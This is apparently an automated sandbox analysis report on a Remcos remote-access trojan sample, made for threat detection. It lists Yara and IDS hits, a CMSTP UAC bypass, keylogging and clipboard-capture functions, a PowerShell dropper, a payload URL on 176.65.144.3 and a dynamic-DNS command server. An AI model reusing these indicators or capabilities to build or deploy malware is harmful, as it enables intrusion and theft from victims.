Source: x.exe, 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_31fcaa60-9

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x.exe PID: 7332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAAsm.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPED

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_00406ABC _wcslen,CoGetObject,

4_2_00406ABC

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	4_2_004090DC
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	4_2_0040B6B5
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	4_2_0041C7E5
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	4_2_0040B8BA
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0044E989 FindFirstFileExA,	4_2_0044E989
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	4_2_00408CDE
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW,	4_2_00419CEE
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	4_2_00407EDD
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00406F13 FindFirstFileW,FindNextFileW,	4_2_00406F13

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

4_2_00407357

Source: C:\Users\user\AppData\Local\Temp\x.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49718 -> 172.94.9.132:52507

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: remyma.duckdns.org

Uses dynamic DNS services

Source: unknown

DNS query: name: remyma.duckdns.org

Source: global traffic

TCP traffic: 192.168.2.4:57232 -> 162.159.36.2:53

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Mar 2025 10:10:55 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Fri, 07 Mar 2025 06:47:58 GMTETag: "79c00-62fbb00bc6380"Accept-Ranges: bytesContent-Length: 498688Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 6a c8 65 08 0b a6 36 08 0b a6 36 08 0b a6 36 bc 97 57 36 1b 0b a6 36 bc 97 55 36 a3 0b a6 36 bc 97 54 36 16 0b a6 36 01 73 22 36 09 0b a6 36 96 ab 61 36 0a 0b a6 36 5a 63 a3 37 36 0b a6 36 5a 63 a2 37 29 0b a6 36 5a 63 a5 37 12 0b a6 36 01 73 35 36 13 0b a6 36 08 0b a7 36 4f 0a a6 36 a5 62 af 37 6c 0b a6 36 a5 62 59 36 09 0b a6 36 a5 62 a4 37 09 0b a6 36 52 69 63 68 08 0b a6 36 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 2b 43 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 10 00 72 05 00 00 26 02 00 00 00 00 00 64 4d 03 00 00 10 00 00 00 90 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 08 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 01 07 00 04 01 00 00 00 80 07 00 04 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 07 00 ac 3c 00 00 70 e6 06 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 e7 06 00 18 00 00 00 a8 e6 06 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 05 00 fc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5b 71 05 00 00 10 00 00 00 72 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e6 8c 01 00 00 90 05 00 00 8e 01 00 00 76 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 5e 00 00 00 20 07 00 00 0e 00 00 00 04 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 04 4b 00 00 00 80 07 00 00 4c 00 00 00 12 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3c 00 00 00 d0 07 00 00 3e 00 00 00 5e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /dev/cozyrem.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 176.65.144.3 176.65.144.3
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View

ASN Name: VOXILITYGB VOXILITYGB

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49719 -> 178.237.33.50:80

Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_00427321 recv,

4_2_00427321

Source: global traffic	HTTP traffic detected: GET /dev/cozyrem.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: remyma.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net
Source: global traffic	DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa

Source: x.exe, 00000003.00000002.1512945011.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1512945011.00000000035CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://176.65.144.3
Source: powershell.exe, 00000000.00000002.1443530900.000000000605D000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1512945011.0000000003541000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000000.1433913924.0000000000092000.00000002.00000001.01000000.00000009.sdmp, x.exe.0.dr	String found in binary or memory: http://176.65.144.3/dev/cozyrem.exe
Source: RegAAsm.exe, 00000004.00000003.1536498847.00000000006F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/
Source: RegAAsm.exe, 00000004.00000003.1536498847.00000000006F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/$
Source: RegAAsm.exe, 00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000003.1536498847.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000003.1536498847.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000003.1536770834.0000000000701000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000002.3887419828.00000000006CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: x.exe, 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, RegAAsm.exe, 00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, RegAAsm.exe.3.dr	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: RegAAsm.exe, 00000004.00000003.1536498847.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000002.3887419828.00000000006CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp2
Source: RegAAsm.exe, 00000004.00000003.1536498847.00000000006CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpF
Source: RegAAsm.exe, 00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpFS
Source: RegAAsm.exe, 00000004.00000003.1536498847.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000002.3887419828.00000000006CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpO
Source: RegAAsm.exe, 00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: RegAAsm.exe, 00000004.00000003.1536498847.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000002.3887419828.00000000006CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpb
Source: powershell.exe, 00000000.00000002.1443530900.000000000605D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1437118971.0000000005036000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1437118971.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1512945011.00000000035CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1437118971.0000000005036000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1437118971.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000000.00000002.1443530900.000000000605D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1443530900.000000000605D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1443530900.000000000605D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1437118971.0000000005036000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1443530900.000000000605D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_00409D1E SetWindowsHookExA 0000000D,00409D0A,00000000

4_2_00409D1E

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard,

4_2_0040B158

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_0041696E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

4_2_0041696E

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard,

4_2_0040B158

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_00409E4A GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

4_2_00409E4A

Source: Yara match	File source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x.exe PID: 7332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAAsm.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPED

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x.exe PID: 7332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAAsm.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_0041CF2D SystemParametersInfoW,

4_2_0041CF2D

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 8168, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: x.exe PID: 7332, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: RegAAsm.exe PID: 7516, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\x.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0041C077 OpenProcess,NtSuspendProcess,CloseHandle,		4_2_0041C077
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0041C0A3 OpenProcess,NtResumeProcess,CloseHandle,		4_2_0041C0A3

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_00416861 ExitWindowsEx,LoadLibraryA,GetProcAddress,

4_2_00416861

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0042809D	4_2_0042809D
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0045412B	4_2_0045412B
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_004421C0	4_2_004421C0
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_004281D7	4_2_004281D7
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0043E1E0	4_2_0043E1E0
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0041E29B	4_2_0041E29B
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_004373DA	4_2_004373DA
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00438380	4_2_00438380
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00453472	4_2_00453472
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0042747E	4_2_0042747E
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0043E43D	4_2_0043E43D
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_004325A1	4_2_004325A1
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0043774C	4_2_0043774C
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0041F809	4_2_0041F809
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_004379F6	4_2_004379F6
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_004279F5	4_2_004279F5
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0044DAD9	4_2_0044DAD9
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00433C73	4_2_00433C73
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00413CA0	4_2_00413CA0
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00437CBD	4_2_00437CBD
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0043DD82	4_2_0043DD82
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00435F52	4_2_00435F52
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00437F78	4_2_00437F78
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0043DFB1	4_2_0043DFB1

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\RegAAsm.exe 489A4758EA8E46736DC0F67DA790EEBA6D5244DE889DCEE5FF49DCD6E9929736

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: String function: 004351E0 appears 55 times
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: String function: 00401F96 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: String function: 00401EBF appears 36 times
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: String function: 00434ACF appears 44 times
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: String function: 00402117 appears 40 times

Source: x.exe.0.dr

Static PE information: No import functions for PE file found

